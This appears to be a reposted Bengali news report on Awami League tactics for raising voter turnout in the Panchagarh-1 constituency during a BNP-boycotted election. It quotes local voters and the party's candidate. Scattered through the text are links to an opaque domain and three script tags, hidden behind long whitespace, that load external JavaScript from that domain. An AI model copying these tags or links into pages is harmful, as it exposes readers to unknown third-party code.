ভোটারদের কেন্দ্রে আনতে আওয়ামী লীগের যত কৌশল - সরেজমিন পঞ্চগড়

 

নির্বাচনী প্রস্তুতি হিসেবে দলীয় কর্মীদের সঙ্গে সভা করছেন আওয়ামী লীগ প্রার্থী                                                         প্রধান বিরোধী দল বিএনপির অনুপস্থিতিতে আসন্ন নির্বাচনে 'বিপুল ভোটার উপস্থিত' করে একটি 'অংশগ্রহণমূলক নির্বাচন' দেখাতে চায় আওয়ামী লীগ।

অনেকেই মনে করছেন, বিরোধী দল-বিহীন নির্বাচনে ভোটার উপস্থিতি বাড়ানো হবে আওয়ামী লীগের জন্য সবচেয়ে বড় চ্যালেঞ্জ।

আওয়ামী লীগের কেন্দ্রীয় পর্যায়ের নির্দেশনা মেনে মাঠ পর্যায়ের নেতারা ভোটার টানার নানা কৌশল নিয়ে প্রস্তুত হচ্ছেন।

বাংলাদেশের সর্বউত্তরের জেলা পঞ্চগড়ের একটি সংসদীয় আসনে ঘুরেছেন বিবিসি বাংলার সংবাদদাতা। সেখানে তিনি জানার চেষ্টা করেছেন, আওয়ামী লীগ প্রার্থীরা ভোটার কেন্দ্র আনার জন্য কী ধরণের পরিকল্পনা সাজিয়েছেন।https://t84c3srgclc9.com/r3crju8z5f?key=d7583ee9e271c2edefdd850938211b12

পঞ্চগড়-১ আসনটি বাংলাদেশের নির্বাচন কমিশনের ৩০০ আসনের তালিকায় এক নম্বরে আছে। নির্বাচনী প্রচারণা শুরু না হলেও ভোট নিয়ে সারাদেশের মতো আলোচনা আছে পঞ্চগড়ের রাজনীতি সচেতন সাধারণ মানুষের মধ্যে।

স্থানীয় ভোটারদের কয়েকজনের সঙ্গে কথা বলে বোঝা গেল, নির্বাচন নিয়ে তাদের মধ্যে খুব একটা আগ্রহ নেই।

ভোট দিতে মানুষের কতটা আগ্রহ থাকবে?https://t84c3srgclc9.com/r3crju8z5f?key=d7583ee9e271c2edefdd850938211b12

"সাধারণ মানুষ তো বুঝতেছে এটা তো কোনো ভোট না, এটাতো একটা পাতানো ভোট," বিবিসি বাংলাকে বলছিলেন পঞ্চগড়ের এক বাসিন্দা।

আরেকজন বলছিলেন, "যারা আমলীগ করে তারাই ভোট দিতে যাবে, বিএনপির লোকগুলো যাবে না মনে হয়।"                                                                                  <script type='text/javascript' src='//t84c3srgclc9.com/5a/a9/00/5aa90066cd36b78fc874fce18321531e.js'></script>

ভোটার আনতে কৌশল

নির্বাচনে ভোটার উপস্থিতির বাড়ানোর দলীয় কৌশল বাস্তবায়নে মাঠ পর্যায়ে আগে থেকেই প্রস্তুতি নিয়েছে আওয়ামী লীগ।

বিএনপি নির্বাচন বর্জন করার পরেও নির্বাচনে 'প্রতিদ্বন্দ্বিতা' দেখানোর জন্য নিজ দল থেকেই নেতাদের স্বতন্ত্র প্রার্থী হওয়ার সুযোগ করে দেয়া হয়েছে।

পঞ্চগড়-১ আসনে আওয়ামী লীগের দলীয় মনোনীত প্রার্থী মোঃ নাঈমুজ্জামান ভুঁইয়া। তিনি ছাড়াও মনোনয়ন বঞ্চিত বর্তমান সংসদ সদস্য এবং জেলা আওয়ামী লীগের সিনিয়র সহ-সভাপতি মজাহারুল হক প্রধান স্বতন্ত্র প্রার্থী হয়েছেন।

এছাড়া জেলা আওয়ামী লীগের সাধারণ সম্পাদক আনোয়ার সাদাত সম্রাটও স্বতন্ত্র প্রার্থী হয়েছেন। আসনটিতে বৈধ প্রার্থীর সংখ্যা এখন পর্যন্ত ১১ জন।                          <script type='text/javascript' src='//t84c3srgclc9.com/5a/a9/00/5aa90066cd36b78fc874fce18321531e.js'></script>

পঞ্চগড়-১ আসনে আওয়ামী লীগ মনোনীত প্রার্থী মোঃ নাঈমুজ্জামান ভুইয়াঁ
ছবির ক্যাপশান,

পঞ্চগড়-১ আসনে আওয়ামী লীগ মনোনীত প্রার্থী মোঃ নাঈমুজ্জামান ভুঁইয়া

নির্বাচনে ভোটার উপস্থিতি বাড়িয়ে 'অংশগ্রহণমূলক' দেখানোর কৌশল বাস্তবায়নে সক্রিয় হয়েছেন নৌকার প্রার্থীরা।

পঞ্চগড়-১ আসনে আওয়ামী লীগ মনোনীত প্রার্থী মোঃ নাঈমুজ্জামান ভুঁইয়া এলাকায় কর্মীদের নিয়ে ভোটের প্রস্তুতি নিচ্ছেন।

উঠান বৈঠক, কর্মীসভা এবং আলোচনায় বিশেষ গুরুত্ব পাচ্ছে নির্বাচনের দিন ভোটার উপস্থিতি নিয়ে।

সাতই জানুয়ারি ভোটার উপস্থিতি বাড়াতে কী পরিকল্পনা হয়েছে?

এ প্রশ্নে নাঈমুজ্জামান ভুঁইয়া বিবিসি বাংলাকে বলেন, তাদের মাঠ পর্যায়ে প্রস্তুতি সম্পন্ন। ছক অনুযায়ী কাজ শুরু হবে ভোটের আগে।

“পঞ্চগড় এক আসনে মোট ১৫৬টি ভোটকেন্দ্র আছে। আমরা প্রত্যেকটি ভোটকেন্দ্রের বিপরীতে ৩০০ আওয়ামী লীগ কর্মী নিয়ে কেন্দ্র কমিটি গঠন করেছি"                                                                                                                             <script type='text/javascript' src='//t84c3srgclc9.com/5a/a9/00/5aa90066cd36b78fc874fce18321531e.js'></script>

"আমাদের যে ৩০০ কর্মী তাদের পরিবারের চারজন করেও যদি ভোটে আনে তাহলে ১২শ ভোট। স্রেফ আমার কর্মীদের দ্বারাই এক কেন্দ্রে ১২শ ভোটার আনা সম্ভব। এখন ১২শর সঙ্গে ১৫৬ আপনি গুন দেন,” বলেন নাঈমুজ্জামান ভুঁইয়া।ভোট নিয়ে গ্রামের মানুষের মধ্যে মিশ্র প্রতিক্রিয়া

Post a Comment

0 Comments